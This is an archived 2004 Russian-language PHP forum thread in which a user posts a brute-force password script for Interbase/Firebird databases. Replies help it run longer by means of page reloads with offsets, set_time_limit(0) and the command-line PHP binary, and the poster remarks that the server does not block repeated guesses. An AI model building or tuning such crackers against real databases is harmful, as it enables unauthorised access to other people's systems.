Bruetforce (переборщик паролей) БД :) / PHP, Perl, Python

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / Bruetforce (переборщик паролей) БД :)

10 сообщений из 10, страница 1 из 1

Bruetforce (переборщик паролей) БД :)

#32414530

Gallagher

Гость

Доброго всем времени суток!

Вот недавно сел за PHP и вздумалось мне написать переборщик паролей для Interbase. Появилась трабла: после перебора ~1000 паролей, скрипт обрывается. В чём бы могло быть дело? Думал что превышен тайм-аут ожидания браузером страницы от сервера, но как и где исправить?
С паролями длины <= 3 разбирается быстро.

WinXP build 2600
Apache/1.3.20
PHP 4
Firebird 1.5

Скрипт:

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.

    if (($Host == '') or ($Username == '')) die();
		
    $Password  = array('a');
    $flag==false;
    $Connected = false;		
    $i =  0 ;
	
    while ((!$Connected) and ($flag==false))
      {	$i++;
	$Password[ 0 ]++;
	$Password_Str = implode( "", $Password);
	if (strlen($Password_Str)>=$Passw_Length) $flag=true;

	// контрольне отображения текущего пароля каждые 100  попыток
        if ($i %  100  ==  0 ) echo "$Password_Str  ";
      	if ($dbh = @ibase_connect(stripslashes($Host), $Username,$Password_Str))
		$Connected = true; }
      
     if ($Connected)
		{ echo " <BR>Password: $Password_Str <BR> ";
		   ibase_close($dbh); }
	else	echo " <BR>No passwords were found<BR> ";

     echo " $i passwords was bruetforced <BR>";

И ещё вопрос... если этот скрипт оформить отдельным php файлом, который результаты своей работы будет сохранять в файл/базу, есть какая-нибудь возможность его запуска на сервере акромя как не из браузера, а?

...

Рейтинг:

0 / 0

19.02.2004, 03:20

| Ответить | Цитировать | Написать

Bruetforce (переборщик паролей) БД :)

#32414783

Рыжий Кот

Участник

Откуда: Мягкий Диван; [забанен] Рустамом; [разбанен] П02;

Сообщения: 22 237

Рейтинг: 0 / 0

Нужно делать так:
после, например, каждой 1000 паролей перезагружать страницу, в урле которой будет очередное смещение.
Таким образом, можно перебирать сколь угодно долго (так поиск на многих форумах организован).
Причем :) можешь остановить, а утром продолжить с того места где остановился, просто прописывая свое последнее смещение...
причем перегружать ни в коем случае НЕ инструкцией php "header("location ..."), а при помощи javascript. javascript ставишь в конец страницы

...

Рейтинг:

0 / 0

19.02.2004, 10:40

| Ответить | Цитировать | Написать

Bruetforce (переборщик паролей) БД :)

#32415900

Шогал

Участник

Откуда: Калининград

Сообщения: 1 359

Рейтинг: 0 / 0

А может быть после 1000 запросов сервер с БД начинает игнорировать айпишник в целях безопасности?

SHOGAL

...

Рейтинг:

0 / 0

19.02.2004, 17:15

| Ответить | Цитировать | Написать

Bruetforce (переборщик паролей) БД :)

#32416481

Gallagher

Гость

Рыжий Кот, спасибо за идею с самоперегрузом страницы - помогло, так что interbase сервер клал с большой колокольни сколько раз с какого IP к нему ломятся - в этом кстати есть недосмотр бормановцев.

Единственно остался вопрос, почему в старой версии ( да и вообще на "длинных" по процессорному времени циклах) скрипт с какого-то места обрывается. Какие соображения? Куда копать? Виноват ли апач или PHP? Или у меня руки корявые?

...

Рейтинг:

0 / 0

20.02.2004, 10:31

| Ответить | Цитировать | Написать

Bruetforce (переборщик паролей) БД :)

#32416555

Шогал

Участник

Откуда: Калининград

Сообщения: 1 359

Рейтинг: 0 / 0

У меня PHP в исполнении CGI вырубался вообще даже на коротких скриптах... Наверное, у программиста, реализовавшего версию для Win32 руки были корявые ;) А как только поставил в виде модуля - весь глюк исчез...

SHOGAL

...

Рейтинг:

0 / 0

20.02.2004, 11:04

| Ответить | Цитировать | Написать

Bruetforce (переборщик паролей) БД :)

#32416725

Макс М.

Участник

Откуда: Кременчуг, Украина

Сообщения: 1 703

Рейтинг: 0 / 0

во-первых апач имеет таймаут на время одного процесса
во-вторых пхп имеет ограничения на время испольнения скрипта (в mod_php)

нужно пхп как php_cli компилировать и запускать из шелла

...

Рейтинг:

0 / 0

20.02.2004, 12:13

| Ответить | Цитировать | Написать

Bruetforce (переборщик паролей) БД :)

#32417566

Gallagher

Гость

Ура! Нашёл простое решение для выполнения "долгоиграющих" PHP скриптов. Тайм-аут пхп можно поменять в самом процессе воспользовавшись нехитрой функцией:

Код: plaintext

1.
2.
3.

<?
set_time_limit( 0 );
?>

Осталось тока пару вопросов к глубокоуважаемому сообществу:
1) как запустить PHP скрипт на сервере не из браузера (типо планировщика чего-нить)
2) ШогалА как только поставил в виде модуля - весь глюк исчез...
можно поподробнее про "в виде модуля"? я пхп привинчивал к апачу по мануалам PHP и добрым советам из инета. А как ещё его можно подключить?
3) 4Макс М. Думаю, с перекомпиляцией PHP под Win я не справлюсь, но всё же спасибо :)

...

Рейтинг:

0 / 0

20.02.2004, 22:33

| Ответить | Цитировать | Написать

Bruetforce (переборщик паролей) БД :)

#32417708

Макс М.

Участник

Откуда: Кременчуг, Украина

Сообщения: 1 703

Рейтинг: 0 / 0

1. под какую ОС ? Планировщик задач под Виндой и cron под *тшч
2. с пхп в архиве идет файл install.txt , там описано как модулем ставить (еще есть статья на faq.phpclub.net)
3. под виндой php-cli уже скомпилирован. Файл php-cli.exe или в папке ./cli/php.exe

...

Рейтинг:

0 / 0

21.02.2004, 13:07

| Ответить | Цитировать | Написать

Bruetforce (переборщик паролей) БД :)

#32417710

Макс М.

Участник

Откуда: Кременчуг, Украина

Сообщения: 1 703

Рейтинг: 0 / 0

> cron под *тшч
и cron под *nix

...

Рейтинг:

0 / 0

21.02.2004, 13:11

| Ответить | Цитировать | Написать

Bruetforce (переборщик паролей) БД :)

#32668437

tester999

Гость

в php.ini есть параметр отвечающий за время работы скрипта

...

Рейтинг:

0 / 0

27.08.2004, 11:23

| Ответить | Цитировать | Написать

10 сообщений из 10, страница 1 из 1

Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / Bruetforce (переборщик паролей) БД :)

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=23&fpage=503&tid=1479428]:	0ms
get settings:	9ms
get forum list:	12ms
check forum access:	3ms
check topic access:	3ms
track hit:	38ms
get topic data:	12ms
get forum data:	2ms
get page messages:	45ms
get tp. blocked users:	1ms
others:	321ms

total:	446ms